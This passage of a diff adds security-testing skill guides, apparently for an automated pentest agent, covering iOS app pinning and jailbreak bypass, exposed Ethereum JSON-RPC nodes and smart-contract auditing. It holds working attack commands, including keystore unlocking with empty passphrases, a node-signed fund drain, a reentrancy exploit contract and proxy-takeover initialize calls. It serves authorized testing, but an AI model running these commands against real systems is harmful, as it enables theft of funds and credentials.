+frida-trace -U -f com.target.app -m '-[* application:openURL:options:]' -m '-[* *:openURLContexts:]'
+curl -s https://target.com/.well-known/apple-app-site-association
+```
+
+### WKWebView Vulnerabilities
+
+- `WKWebView` loading attacker-influenced or cleartext URLs; deprecated `UIWebView` (no process isolation) still present
+- `WKScriptMessageHandler` bridges (`window.webkit.messageHandlers.<name>.postMessage`) trusting JS-supplied data into native actions
+- `allowFileAccessFromFileURLs`/`allowUniversalAccessFromFileURLs` (via `setValue:forKey:` on the config) enabling `file://` sandbox reads from loaded content (see xss for the in-WebView payload)
+
+**Test:**
+```
+class-dump -H "target_extract/Payload/Target.app/Target" -o headers/ && grep -rnE 'WKWebView|UIWebView|messageHandlers|allowFileAccess|loadRequest|loadHTMLString' headers/
+otool -ov "target_extract/Payload/Target.app/Target" | grep -iE 'addScriptMessageHandler|allowUniversalAccessFromFileURLs'
+frida-trace -U -f com.target.app -m '-[WKWebView loadRequest:]' -m '-[* userContentController:didReceiveScriptMessage:]'
+```
+
+### Jailbreak Detection and Cert-Pinning Bypass
+
+- Jailbreak checks (file existence of `/Applications/Cydia.app`, `/bin/bash`, `fork()` success, scheme `cydia://`) are client-side and hookable
+- Pinning via `NSURLSession` `didReceiveChallenge`, TrustKit, AFNetworking `AFSecurityPolicy`, or Alamofire `ServerTrustManager` - all bypassable on a jailbroken device
+- These are device-trust controls: they stop network attackers, not an attacker who controls the jailbroken device
+
+**Test:**
+```
+# bypass jailbreak detection + pinning at runtime (jailbroken device)
+objection -g com.target.app explore -s "ios jailbreak disable"
+objection -g com.target.app explore -s "ios sslpinning disable"
+frida -U -f com.target.app -l frida-ios-pinning-bypass.js
+# system-wide TLS interception alternative
+# install SSL Kill Switch 2 (.deb via Cydia/Sileo) then route traffic through a proxy
+otool -ov "target_extract/Payload/Target.app/Target" | grep -iE 'evaluateServerTrust|SecTrustEvaluate|AFSecurityPolicy|TrustKit'
+```
+
+### Insufficient Binary Protections
+
+- No PIE (`MH_PIE` flag absent) defeats ASLR; missing stack canaries (`__stack_chk_guard`/`___stack_chk_fail` not linked); ARC disabled (manual retain/release, use-after-free risk)
+- Absence of these does not by itself grant access but lowers the bar for memory-corruption exploitation
+
+**Test:**
+```
+otool -hv "target_extract/Payload/Target.app/Target" | grep -i PIE          # expect PIE flag
+otool -Iv "target_extract/Payload/Target.app/Target" | grep -E 'stack_chk_guard|stack_chk_fail'   # stack canaries
+otool -Iv "target_extract/Payload/Target.app/Target" | grep -E 'objc_release|objc_retainAutorelease'  # ARC indicators
+nm "target_extract/Payload/Target.app/Target" | grep -E '___stack_chk_fail|_objc_autoreleasePoolPush'
+```
+
+## Bypass Techniques
+
+**Jailbreak-detection bypass**
+- objection `ios jailbreak disable` or a Frida hook on the detection method; for stubborn checks, hook `fileExistsAtPath:`, `canOpenURL:`, and `fork`/`stat` to lie about the environment
+
+**Pinning bypass**
+- objection/Frida hook of the trust-evaluation callback, or SSL Kill Switch 2 to disable system-wide trust evaluation, then proxy the traffic
+
+**Repackaging on jailbroken devices**
+- Patch and resign with a developer cert + `ldid`/`codesign`, or inject a Frida gadget dylib (`optool`/`insert_dylib`) into the Mach-O to instrument without a jailbreak (requires resigning under your own provisioning profile)
+
+**Scheme/link hijack**
+- Register a competing app declaring the victim's custom URL scheme; iOS resolution between apps claiming the same scheme is undefined, enabling interception of scheme-borne data
+
+## Testing Methodology
+
+1. **Extract** - `unzip` the IPA, locate `Payload/<App>.app`, read `Info.plist` and entitlements (`codesign -d --entitlements`)
+2. **Check encryption** - `otool -l ... | grep LC_ENCRYPTION_INFO`; if `cryptid 1`, dump the decrypted Mach-O from a jailbroken device with frida-ios-dump
+3. **Baseline scan** - run the IPA through MobSF for ATS, plist, binary-protection, and secret findings in one pass
+4. **Static binary analysis** - `class-dump` for the class/method map, `otool -ov`/`nm`/`strings` for symbols and constants, Hopper/Ghidra for logic; hunt pinning, jailbreak, and secret code paths
+5. **Config review** - parse `Info.plist` for URL schemes, ATS exceptions, and associated domains; validate the `apple-app-site-association`
+6. **Storage review** - on a jailbroken device, dump NSUserDefaults, plists, Core Data/SQLite, and the Keychain; check protection classes and backup inclusion
+7. **IPC abuse** - enumerate and trigger custom schemes/universal links; trace `openURL`/`scene` handlers; exercise WKWebView message handlers
+8. **Runtime instrumentation** - attach Frida/objection (jailbroken device) to bypass jailbreak detection and pinning, then proxy decrypted traffic
+9. **Binary hardening** - confirm PIE, stack canaries, and ARC; note gaps as exploitation-enablers, not standalone findings
+
+## Validation
+
+1. For binary findings, work from a confirmed decrypted dump (`cryptid 0` after dumping) - static results on an encrypted binary are meaningless
+2. For insecure storage/Keychain, extract the concrete secret and show its protection class is weaker than required (e.g. present in an unencrypted backup or readable while locked)
+3. For hardcoded secrets, demonstrate the key authenticating to its service; exclude public identifiers and restricted client keys
+4. For pinning/jailbreak bypass, capture a decrypted request/response through the proxy after the bypass - the plaintext traffic is the proof
+5. For URL schemes/universal links, demonstrate the downstream effect (idor read, ssrf, session manipulation) reached via the link, not merely that the app opens
+6. For binary protections, report missing PIE/canary/ARC only as a hardening gap with the exploitation context, never as an exploited vulnerability on its own
+
+## False Positives
+
+- Static analysis of an encrypted App Store binary (`cryptid 1`) - `class-dump`/`strings` yield garbage; results are invalid until decrypted
+- Pinning/jailbreak "bypass" that only works on a jailbroken device - that is the expected device-trust model, not a server-side flaw
+- Hardcoded "secrets" that are public identifiers (third-party SDK app ids, restricted client keys, OAuth client ids)
+- ATS exceptions scoped to `localhost` or a vendor's documented media domain that genuinely cannot serve TLS
+- Keychain items intentionally `AfterFirstUnlock` for legitimate background access (e.g. push-token refresh) where no secret is exposed
+- Missing PIE/canaries on a binary with no reachable memory-corruption sink - a hardening note, not a vulnerability
+
+## Impact
+
+- Account takeover and privilege escalation via URL-scheme/universal-link injection into auth flows
+- Theft of credentials, tokens, and PII from NSUserDefaults, plists, Core Data, or weakly protected Keychain items (including via backups)
+- Backend compromise from hardcoded API keys, cloud credentials, or encryption keys recovered from the binary
+- Code execution / native-action abuse through a WKWebView script-message bridge
+- Network MITM and traffic decryption where ATS is disabled or pinning is the only protection
+- Exposure of private APIs, business logic, and debug functionality from a decrypted binary's recovered symbols
+- Easier memory-corruption exploitation where PIE, canaries, or ARC are absent
+
+## Pro Tips
+
+1. Always check `LC_ENCRYPTION_INFO` first - analyzing an encrypted App Store binary wastes time; dump it decrypted before class-dump/strings
+2. The iOS Simulator runs unencrypted binaries but has no real Keychain, Data Protection, or jailbreak semantics - use a jailbroken device for storage, Keychain, pinning, and detection work
+3. `class-dump` plus `frida-trace -m '-[Class method:]'` is the fastest loop: map methods statically, then watch the interesting ones live
+4. URL schemes are claimable by any app - the calling app is never trustworthy; treat every scheme parameter as attacker-controlled input
+5. Universal links need both the associated-domains entitlement and a reachable `apple-app-site-association`; a missing/invalid AASA silently degrades to the hijackable custom scheme
+6. Run objection's `ios sslpinning disable` and `ios jailbreak disable` before launching the target flow, not after - both checks fire early in startup
+7. Keychain `kSecAttrAccessible*` without `ThisDeviceOnly` means the secret leaves the device in a backup - grep the binary for the constant and confirm at runtime
+8. SSL Kill Switch 2 disables trust evaluation system-wide when per-app Frida hooks are flaky against custom pinning stacks
+9. For non-jailbroken instrumentation, inject a Frida gadget dylib with `optool`/`insert_dylib` and resign under your own provisioning profile
+
+## Summary
+
+iOS findings chain from the binary and config outward: a decrypted Mach-O reveals logic, pinning/jailbreak code, and compiled secrets; the `Info.plist` exposes URL schemes and ATS gaps; insecure storage and weak Keychain protection classes supply credentials; and a trusting scheme handler or WKWebView bridge turns external input into account takeover or native-action abuse. Static tools (class-dump, otool, nm, MobSF) map the surface, but the real-world workflow begins with decrypting the binary on a jailbroken device and ends with Frida/objection defeating the client-side controls - pinning and jailbreak detection - that were the app's only protection. Validate every finding with the concrete effect: extracted secret, decrypted request, or privileged action reached through the IPC surface.

--- a/strix/skills/web3/blockchain_rpc.md
+++ b/strix/skills/web3/blockchain_rpc.md
@@ -1,0 +1,240 @@
+---
+name: blockchain-rpc
+description: Blockchain node and JSON-RPC security - exposed/unauthenticated RPC, personal_/admin_/debug_/miner_/txpool_ methods, open Geth/Erigon/Nethermind nodes, dApp signing abuse, approval drains, permit phishing, and key/mnemonic exposure
+---
+
+# Blockchain Node & JSON-RPC Security
+
+Ethereum-compatible nodes expose a JSON-RPC interface that, when reachable without authentication and with privileged namespaces enabled, lets an attacker enumerate accounts, unlock keystores, sign and broadcast transactions, dump node internals, and drain any unlocked wallet. The default 8545/8546 (HTTP/WS) ports were historically bound to all interfaces with `personal_`, `admin_`, `miner_`, and `debug_` namespaces live, and countless nodes are still deployed that way behind a port forward or a misconfigured firewall. On the client side, dApp front-ends ask wallets to sign opaque payloads — blind `eth_sign`, unlimited ERC-20 approvals, and EIP-2612 permits — so a malicious or compromised front-end extracts funds without ever touching the node. This skill covers both the server side (exposed RPC, key material) and the client side (signing abuse, approval drains); the unauthenticated-RPC class is closely related to ssrf when an internal node is reached through a server-side request.
+
+## Attack Surface
+
+**Scope**
+- HTTP JSON-RPC (default port 8545) and WebSocket JSON-RPC (default port 8546)
+- IPC sockets (`geth.ipc`) when local/container access exists — IPC exposes all namespaces unconditionally
+- Engine API (port 8551, JWT-authenticated consensus<->execution channel)
+- Node clients: Geth, Erigon, Nethermind, Besu, Reth, and the Anvil/Hardhat dev nodes
+- dApp front-ends and the wallet (MetaMask, WalletConnect) signing surface
+- Keystore files, mnemonics, and plaintext private keys on disk or in env/CI
+
+**Entry Points**
+- Internet-exposed 8545/8546 with no auth and privileged namespaces enabled
+- `personal_*` (account unlock/sign/send), `admin_*` (peers, nodeInfo), `debug_*` (traceTransaction, dumpBlock), `miner_*`, `txpool_*`
+- Server-side request forgery reaching an internal `http://localhost:8545` (see ssrf)
+- A malicious or XSS-compromised dApp front-end prompting `eth_sendTransaction`, `eth_sign`, `eth_signTypedData`, `approve`, or `permit`
+- Leaked keystore/mnemonic via exposed config, backups, repo commits, or `debug` dumps
+
+**Authentication and trust model**
+- Public read methods (`eth_blockNumber`, `eth_call`, `eth_getBalance`) are usually harmless to expose
+- State-changing methods require either an unlocked account (server holds the key) or a client-side signature (wallet holds the key)
+- `--http.api`/`--ws.api` allowlists which namespaces are served; the dangerous ones are `personal,admin,debug,miner,txpool`
+- Engine API uses a JWT shared secret (`jwtsecret` file); a leaked secret yields consensus-layer control
+- The wallet trusts the front-end to render an honest transaction — blind signing breaks that trust
+
+## Key Vulnerabilities
+
+### Exposed / Unauthenticated JSON-RPC
+
+A node bound to `0.0.0.0:8545` with no reverse-proxy auth answers any caller. Read methods leak chain/account data; if write namespaces are enabled, the node is fully controllable. Probe for liveness and the served namespace set first.
+
+**Test:**
+```
+# Liveness + client/version fingerprint
+curl -s -X POST http://TARGET:8545 -H 'Content-Type: application/json' \
+  -d '{"jsonrpc":"2.0","id":1,"method":"web3_clientVersion","params":[]}'
+# Chain + sync state
+curl -s -X POST http://TARGET:8545 -H 'Content-Type: application/json' \
+  -d '{"jsonrpc":"2.0","id":1,"method":"eth_chainId","params":[]}'
+# cast equivalents
+cast client --rpc-url http://TARGET:8545
+cast chain-id --rpc-url http://TARGET:8545
+cast block-number --rpc-url http://TARGET:8545
+```
+
+### Privileged Namespace Abuse (personal_/admin_/debug_/miner_/txpool_)
+
+`eth_accounts` lists local accounts; `personal_unlockAccount` unlocks a keystore with a guessed/known passphrase; `personal_sendTransaction` and `eth_sendTransaction` then move funds using the node's own key. `admin_*` reveals peers and node identity, `debug_*` dumps state and traces, `miner_*` controls block production, `txpool_*` exposes the local mempool.
+
+**Test:**
+```
+# Enumerate node-held accounts
+curl -s -X POST http://TARGET:8545 -H 'Content-Type: application/json' \
+  -d '{"jsonrpc":"2.0","id":1,"method":"eth_accounts","params":[]}'
+# Attempt unlock (empty / common passphrase), 300s window
+curl -s -X POST http://TARGET:8545 -H 'Content-Type: application/json' \
+  -d '{"jsonrpc":"2.0","id":1,"method":"personal_unlockAccount","params":["0xACCOUNT","",300]}'
+# Drain via node-signed tx (do NOT run against assets you do not own)
+curl -s -X POST http://TARGET:8545 -H 'Content-Type: application/json' \
+  -d '{"jsonrpc":"2.0","id":1,"method":"eth_sendTransaction","params":[{"from":"0xACCOUNT","to":"0xSINK","value":"0x16345785d8a0000"}]}'
+# Node internals
+curl -s -X POST http://TARGET:8545 -H 'Content-Type: application/json' \
+  -d '{"jsonrpc":"2.0","id":1,"method":"admin_nodeInfo","params":[]}'
+curl -s -X POST http://TARGET:8545 -H 'Content-Type: application/json' \
+  -d '{"jsonrpc":"2.0","id":1,"method":"txpool_content","params":[]}'
+cast rpc debug_traceTransaction 0xTXHASH --rpc-url http://TARGET:8545
+```
+
+### Open Geth / Erigon / Nethermind Nodes
+
+Mass-scannable: the RPC port plus the P2P/discovery and metrics ports. Banner and method-set differ per client (`web3_clientVersion` returns `Geth/...`, `erigon/...`, `Nethermind/...`). Enumerate which namespaces each client left enabled, since defaults and flags differ.
+
+**Test:**
+```
+# Discover RPC + ancillary ports
+nmap -sV -Pn -p 8545,8546,8551,30303,6060,8008 --open TARGET
+# Banner-grab JSON-RPC with nmap script engine over HTTP
+nmap -p 8545 --script http-post --script-args 'http-post.path=/,http-post.body={"jsonrpc":"2.0","id":1,"method":"web3_clientVersion","params":[]}' TARGET
+# Which namespaces respond? loop methods and watch for "method not found" vs a result
+for m in eth_accounts personal_listAccounts admin_peers debug_metrics miner_start txpool_status; do
+  echo -n "$m: "; curl -s -X POST http://TARGET:8545 -H 'Content-Type: application/json' \
+    -d "{\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"$m\",\"params\":[]}"; echo
+done
+```
+
+### dApp Front-End Signing Abuse (blind signing)
+
+A malicious front-end requests `eth_sendTransaction` with crafted `data`, or asks the user to "verify" via a signature that is actually an authorization. Blind signing — approving a hex blob the wallet cannot decode — is the core failure. Distinguish `eth_sign` (signs *arbitrary 32 bytes*, including a valid tx hash — extremely dangerous), `personal_sign` (prefixes the EIP-191 string so it cannot be a tx), and `eth_signTypedData_v4` (structured, but still abusable via misleading types).
+
+**Test:**
+```
+# Enumerate what methods the injected provider exposes (run in dApp page console)
+node -e "const {ethers}=require('ethers');const p=new ethers.JsonRpcProvider(process.env.RPC);p.send('eth_accounts',[]).then(console.log)"
+# eth_sign of a raw 32-byte digest == signing a transaction blind (the dangerous primitive)
+cast rpc eth_sign 0xSIGNER 0x$(python3 -c "print('de'*32)") --rpc-url $RPC
+# web3.js: detect a front-end calling eth_sign vs personal_sign
+node -e "const Web3=require('web3');const w=new Web3(process.env.RPC);w.eth.sign('0xdeadbeef','0xSIGNER').then(console.log).catch(e=>console.log(e.message))"
+```
+
+### Unlimited ERC-20 Approvals / Approval Drains
+
+dApps commonly request `approve(spender, type(uint256).max)` for UX, leaving the spender able to `transferFrom` the user's full balance forever. A malicious or later-compromised spender drains on its own schedule. Enumerate outstanding allowances and revoke; flag any approval to an unverified or EOA spender.
+
+**Test:**
+```
+# Read an outstanding allowance
+cast call $TOKEN "allowance(address,address)(uint256)" $OWNER $SPENDER --rpc-url $RPC
+# Spot unlimited approval (== 2**256-1)
+python3 -c "print(hex(2**256-1))"   # 0xffff...ffff is the red flag
+# Enumerate Approval events for a victim to map every spender granted access
+cast logs --from-block 0 --address $TOKEN \
+  "Approval(address,address,uint256)" $OWNER --rpc-url $RPC
+# Revoke (set allowance to 0)
+cast send $TOKEN "approve(address,uint256)" $SPENDER 0 --rpc-url $RPC --private-key $PK
+```
+
+### Permit Phishing & Domain-Separator / chainId Confusion
+
+EIP-2612 `permit` and Permit2 let a *signature* (no on-chain tx, no gas) authorize a spender — perfect for phishing, since the victim only "signs a message". A signature missing a `chainId` or with a reused/forgeable EIP-712 domain separator is replayable across chains or contracts. Verify the signed `domainSeparator` matches the token's real one and includes the live `chainId`.
+
+**Test:**
+```
+# Read the token's real EIP-712 domain separator and nonce
+cast call $TOKEN "DOMAIN_SEPARATOR()(bytes32)" --rpc-url $RPC
+cast call $TOKEN "nonces(address)(uint256)" $OWNER --rpc-url $RPC
+cast chain-id --rpc-url $RPC   # must be inside the domain the victim signed
+# ethers: reconstruct the domain and confirm a phishing payload's separator differs
+node -e "const {ethers}=require('ethers');console.log(ethers.TypedDataEncoder.hashDomain({name:'USD Coin',version:'2',chainId:1,verifyingContract:process.env.TOKEN}))"
+# A Permit2 SignatureTransfer authorizing an attacker spender is the modern drain vector — inspect signed 'spender'
+```
+
+### Wallet RPC Method Enumeration
+
+The injected EIP-1193 provider (`window.ethereum`) and node both advertise method sets. Enumerating them reveals dangerous capabilities left enabled (`wallet_*`, `personal_*`) and which chains/accounts are reachable, guiding the abuse path.
+
+**Test:**
+```
+# rpc_modules lists every served namespace on a node
+curl -s -X POST http://TARGET:8545 -H 'Content-Type: application/json' \
+  -d '{"jsonrpc":"2.0","id":1,"method":"rpc_modules","params":[]}'
+# In a dApp page: enumerate provider capabilities
+node -e "console.log(['eth_accounts','eth_requestAccounts','wallet_getPermissions','wallet_switchEthereumChain','personal_sign','eth_sign','eth_signTypedData_v4'])"
+# cast: probe arbitrary method support (errors with 'method not found' if disabled)
+cast rpc rpc_modules --rpc-url http://TARGET:8545
+```
+
+### Key / Mnemonic Exposure
+
+Plaintext private keys and BIP-39 mnemonics leak via committed config, `.env`, CI logs, keystore files with empty passphrases, and `debug` dumps. A single leaked key is total account compromise; a mnemonic compromises every derived address. Treat any 64-hex blob or 12/24-word phrase in scope as a live secret.
+
+**Test:**
+```
+# Repo/filesystem sweep for key material (use search tool in-codebase; these are field one-liners)
+grep -rnE "0x[a-fA-F0-9]{64}" . --include='*.env' --include='*.json' --include='*.ts'
+grep -riE "mnemonic|seed phrase|PRIVATE_KEY|(\b[a-z]+\b ){11}[a-z]+" .
+# Keystore with empty/weak passphrase -> derive the address
+cast wallet address --keystore ./keystore/UTC--... --password ""
+# Confirm a leaked key controls funds (read-only: derive address, check balance)
+cast wallet address --private-key 0xLEAKEDKEY
+cast balance $(cast wallet address --private-key 0xLEAKEDKEY) --rpc-url $RPC
+```
+
+## Bypass Techniques
+
+**Reach the bound interface**
+- Node bound to `127.0.0.1` but proxied: hit the reverse proxy path, or pivot through SSRF (see ssrf) to `http://localhost:8545`
+- WebSocket (8546) sometimes enables namespaces the HTTP port (8545) disables — always test both
+
+**Namespace probing**
+- A method returning `the method X does not exist/is not available` means the namespace is *disabled*; any other error (params, account locked) means it is *enabled* — that distinction maps the real attack surface
+
+**Signing primitive confusion**
+- If `eth_sign` is available, a "login signature" request can be a transaction hash in disguise — the wallet signs 32 raw bytes either way
+- A front-end that downgrades `eth_signTypedData_v4` to `eth_sign` is suppressing the human-readable preview on purpose
+
+**Unlock window reuse**
+- `personal_unlockAccount` with a duration keeps the key hot; even a brief window lets a watcher fire `eth_sendTransaction` before re-lock
+
+## Testing Methodology
+
+1. **Scan** - `nmap -p 8545,8546,8551,30303` to find RPC, WS, Engine, and P2P ports across the range
+2. **Fingerprint** - `web3_clientVersion` + `eth_chainId` to identify client (Geth/Erigon/Nethermind) and network
+3. **Enumerate namespaces** - `rpc_modules` and a method-probe loop to learn which of `personal/admin/debug/miner/txpool` are live
+4. **Read first** - `eth_accounts`, `eth_getBalance`, `txpool_content`, `admin_peers` for non-destructive intel
+5. **Test write path** - attempt `personal_unlockAccount` (empty/common passphrase) only against assets you control or have authorization for
+6. **Client-side review** - inspect the dApp for `eth_sign`, blind `eth_sendTransaction`, unlimited `approve`, and `permit` prompts
+7. **Allowance audit** - enumerate `Approval` events and current `allowance` for the in-scope account; flag max approvals to unverified spenders
+8. **Secret sweep** - search repo, config, CI, and keystores for keys/mnemonics; verify any hit derives a funded address
+9. **Engine API** - if 8551 is open, check whether the `jwtsecret` is default/leaked
+
+## Validation
+
+1. Prove a privileged method *responds* (not "method not found") to establish the namespace is enabled, before any state change
+2. For account control, derive the address and read its balance — do not broadcast a drain against assets you are not authorized to move
+3. For approval drains, show the on-chain `allowance` value (`== 2**256-1`) and the spender's verification status
+4. For permit/domain confusion, show the token's real `DOMAIN_SEPARATOR()` and `chainId` versus what a phishing payload signs
+5. For key exposure, derive the public address from the leaked secret and match it to a funded on-chain account — never publish the secret
+6. Capture the exact JSON-RPC request/response so the finding is reproducible
+
+## False Positives
+
+- A reachable RPC that serves only read methods (`eth_*` getters) with `personal/admin/debug` disabled — informational, not critical
+- `eth_accounts` returning `[]` (no node-held keys) so `personal_send` has nothing to move
+- WS/HTTP returning 401/403 or behind an authenticating reverse proxy (auth is working)
+- Unlimited approval to a well-known, audited, immutable router (Uniswap, Permit2) — standard UX, lower risk than an EOA/unverified spender
+- A 64-hex string that is a transaction hash, block hash, or storage value rather than a private key
+- Dev nodes (Anvil/Hardhat) intentionally exposing unlocked accounts on a local-only, non-production chainId
+
+## Impact
+
+- Direct theft of all funds in node-unlocked accounts via `eth_sendTransaction`/`personal_sendTransaction`
+- Full node control: peer manipulation, mining/validation control, mempool surveillance
+- Wallet drain through unlimited approvals or a signed permit — no on-chain victim action required
+- Cross-chain signature replay when `chainId`/domain separator is omitted
+- Total account/identity compromise from a leaked private key or mnemonic (all derived addresses)
+- Information disclosure of internal topology, pending transactions, and account balances (see information_disclosure)
+
+## Pro Tips
+
+1. Always test both 8545 (HTTP) and 8546 (WS) — namespace allowlists frequently differ between transports
+2. `rpc_modules` is the single fastest map of attack surface; if it is disabled, fall back to a method-probe loop and read the error strings
+3. "method does not exist/is not available" = namespace off; a params/account error = namespace on — that error-string distinction is the whole recon
+4. `eth_sign` is the nuclear primitive on the client side: it signs raw bytes, so a "sign-in" prompt can be a transaction hash — flag any dApp that uses it
+5. Unlimited (`2**256-1`) approvals are the most common live drain vector in the wild; enumerate `Approval` logs, not just the current allowance
+6. Permit phishing needs no gas and no on-chain footprint until the drain fires — a "just sign this message" flow is the tell
+7. Internal nodes bound to localhost are reachable through SSRF; chain the ssrf skill to hit `http://169.254.x` or `http://localhost:8545`
+8. Empty-passphrase keystores are common on test/staging boxes promoted to prod — always try `""` and the project name as the passphrase
+9. Never broadcast a proof-of-drain against third-party assets; derive-and-read (address + balance) proves control without theft
+
+## Summary
+
+Blockchain-RPC findings chain from exposure to total compromise on both sides of the wire: an internet-reachable node with `personal_`/`admin_`/`debug_` enabled lets an attacker enumerate accounts, unlock a keystore, and broadcast a node-signed drain, while a dApp that blind-signs or requests unlimited approvals and gasless permits lets the same theft happen with the key never leaving the user's wallet. Recon is namespace enumeration (`rpc_modules` plus the method-probe error-string trick) and signing-primitive triage (`eth_sign` vs `personal_sign`, allowance and domain-separator audits); validate by proving a method responds or a key derives a funded address, and never broadcast a destructive transaction against assets you are not authorized to move.

--- a/strix/skills/web3/smart_contracts.md
+++ b/strix/skills/web3/smart_contracts.md
@@ -1,0 +1,260 @@
+---
+name: smart-contracts
+description: EVM/Solidity smart-contract auditing - reentrancy, overflow, access control, delegatecall proxies, oracle manipulation, signature replay, MEV, DoS, and bad randomness with slither/mythril/foundry/echidna
+---
+
+# EVM Smart Contract Auditing
+
+Smart contracts are immutable, value-holding programs whose bugs cannot be patched and whose state is publicly readable and adversarially mutable. A single missing modifier, an unchecked external call, or a manipulable price source converts directly into irreversible loss of funds because there is no rollback and every actor can simulate, front-run, and replay transactions. EVM execution is deterministic and atomic per transaction, which both enables flash-loan-funded single-block attacks and means a thrown revert undoes all state — the audit job is to find the path where state mutates before a guard fires or where a guard never fires at all. Like classic memory-safety RCE, the root cause is usually control flow reaching a powerful primitive (`call`, `delegatecall`, `selfdestruct`, arbitrary transfer) before the program proves the caller is authorized; see the rce skill for the conceptual parallel.
+
+## Attack Surface
+
+**Scope**
+- Solidity / Vyper source when verified; raw EVM bytecode when not
+- Deployed contract state (storage slots, balances) readable via `eth_getStorageAt` and `eth_call`
+- Proxy patterns: Transparent (EIP-1967), UUPS, Beacon, Diamond (EIP-2535), and naive delegatecall proxies
+- External dependencies: price oracles, DEX pools, ERC-20/721/1155 tokens, bridges, governance
+- The mempool itself (pending transactions are public and reorderable)
+
+**Entry Points**
+- Public/external functions with `payable` or value-moving logic
+- `fallback()` / `receive()` and any `delegatecall` target
+- `initialize()` on upgradeable contracts (replaces the constructor)
+- Callback hooks: ERC-777 `tokensReceived`, ERC-721 `onERC721Received`, ERC-1155 `onERC1155Received`, Uniswap `uniswapV2Call`
+- Oracle/keeper functions and signature-gated functions (`ecrecover`-based meta-tx, permit)
+
+**Identity and authorization**
+- `msg.sender` is the immediate caller; `tx.origin` is the EOA that started the tx (never use for auth)
+- Roles via OpenZeppelin `Ownable` / `AccessControl`, custom `onlyOwner` modifiers, or multisig owners
+- Signature-based auth via `ecrecover` (EIP-712 typed data, EIP-2612 permit) — bypassable if nonce/domain/chainId checks are missing
+- Proxy admin vs implementation logic split — admin functions must be unreachable through the proxy's user path
+
+## Key Vulnerabilities
+
+### Reentrancy (single-function, cross-function, read-only)
+
+State updated *after* an external call lets the callee re-enter before balances settle. Single-function reentrancy re-enters the same withdraw; cross-function reentrancy re-enters a *different* function that shares the now-stale state; read-only reentrancy abuses a `view` getter (e.g. a pool's price) that returns mid-transaction inconsistent state to a third-party integrator. The fix is checks-effects-interactions or a `nonReentrant` guard — but guards do not protect read-only reentrancy in *external* view consumers.
+
+**Test:**
+```
+slither . --detect reentrancy-eth,reentrancy-no-eth,reentrancy-benign,reentrancy-events
+# Foundry PoC (test/Reentrancy.t.sol): attacker re-enters withdraw before the balance zeroes
+cat > test/Reentrancy.t.sol <<'SOL'
+pragma solidity ^0.8.20; import "forge-std/Test.sol";
+interface IVault { function deposit() external payable; function withdraw() external; }
+contract Attacker { IVault v; constructor(address _v){ v=IVault(_v); }
+  function go() external payable { v.deposit{value:msg.value}(); v.withdraw(); }
+  receive() external payable { if (address(v).balance >= 1 ether) v.withdraw(); } }
+SOL
+forge test -vvv   # PASS when attacker balance ends > deposit
+```
+
+### Integer Overflow / Underflow (pre-0.8 + unchecked blocks)
+
+Solidity <0.8.0 wraps silently: `0 - 1` becomes `2**256-1`, letting an attacker mint or underflow a balance. Since 0.8.0 arithmetic reverts on over/underflow, but `unchecked { ... }` blocks restore wrapping for gas savings — and that is exactly where the regression hides. Also check explicit `SafeMath` removal, type downcasts (`uint256 -> uint128`), and multiplication-before-division ordering.
+
+**Test:**
+```
+slither . --detect divide-before-multiply
+# Detect unchecked blocks and pragma
+grep -rn "unchecked" src/ contracts/
+grep -rn "pragma solidity" src/ contracts/    # any ^0.7 / <0.8 is SafeMath-dependent
+# Symbolic check for arithmetic
+myth analyze contracts/Token.sol --solv 0.7.6 -t 3
+# Foundry fuzz: assert no wraparound in accounting
+forge test --match-test testFuzz_NoOverflow --fuzz-runs 100000 -vvv
+```
+
+### Access Control (missing modifiers, unprotected init, tx.origin auth)
+
+State-changing functions without `onlyOwner`/role checks, `initialize()` callable by anyone, ownership-transfer functions with no guard, and authentication keyed on `tx.origin` (phishable via an intermediate contract). Self-destruct or upgrade functions reachable by an arbitrary caller are immediate criticals.
+
+**Test:**
+```
+slither . --detect suicidal,arbitrary-send-eth,unprotected-upgrade,tx-origin
+# Find state-mutating externals with no modifier
+slither . --print function-summary | grep -i "external\|public"
+# Confirm initialize is open
+cast call $C "owner()(address)" --rpc-url $RPC
+cast send $C "initialize(address)" $ATTACKER --rpc-url $RPC --private-key $PK   # should revert if guarded
+# tx.origin auth grep
+grep -rn "tx.origin" src/ contracts/
+```
+
+### Delegatecall + Proxy Storage Collisions
+
+`delegatecall` runs target code against the caller's storage and `msg.sender`/`msg.value` context. If the proxy and implementation lay out storage differently, a write to "implementation slot 0" clobbers the proxy's `owner`. EIP-1967 fixes this with pseudo-random admin/implementation slots; naive proxies that put `address implementation` in slot 0 collide with the logic contract's slot 0. Arbitrary `delegatecall` to a user-supplied address is full takeover.
+
+**Test:**
+```
+slither . --detect controlled-delegatecall,delegatecall-loop
+# Read EIP-1967 implementation + admin slots from a deployed proxy
+cast storage $PROXY 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc --rpc-url $RPC  # impl
+cast storage $PROXY 0xb53127684a568b3173ae13b9f8a6016e243e63b6e8ee1178d6a717850b5d6103 --rpc-url $RPC  # admin
+# Compare proxy vs implementation storage layout
+forge inspect src/Proxy.sol:Proxy storageLayout
+forge inspect src/Logic.sol:Logic storageLayout
+```
+
+### Uninitialized Proxy / Implementation
+
+UUPS/Transparent implementations left uninitialized let an attacker call `initialize()` on the *implementation* contract directly, become its owner, and (for UUPS) call `upgradeToAndCall` with a contract that `selfdestruct`s the implementation — bricking every proxy that delegates to it (the Parity multisig class of bug). Implementations must call `_disableInitializers()` in their constructor.
+
+**Test:**
+```
+slither . --detect unprotected-upgrade
+# Is the implementation itself initialized?
+IMPL=$(cast storage $PROXY 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc --rpc-url $RPC)
+cast call ${IMPL:26} "owner()(address)" --rpc-url $RPC   # 0x0 => claimable
+cast send ${IMPL:26} "initialize(address)" $ATTACKER --rpc-url $RPC --private-key $PK
+# Confirm constructor disables initializers
+grep -rn "_disableInitializers" src/ contracts/
+```
+
+### Unchecked Low-Level Call Return Values
+
+`addr.call(...)`, `.send()`, and ERC-20 `transfer`/`transferFrom` on non-reverting tokens (USDT, BNB-era tokens) return `false`/nothing instead of reverting. Code that ignores the boolean believes a failed transfer succeeded, mis-accounting balances. Use OpenZeppelin `SafeERC20` and always check `(bool ok, ) = ...; require(ok);`.
+
+**Test:**
+```
+slither . --detect unchecked-lowlevel,unchecked-send,unchecked-transfer
+grep -rnE "\.call\{?|\.send\(|\.transfer\(" src/ contracts/
+forge test --match-test testTransferFalse -vvv
+```
+
+### Price-Oracle Manipulation via Flash Loans
+
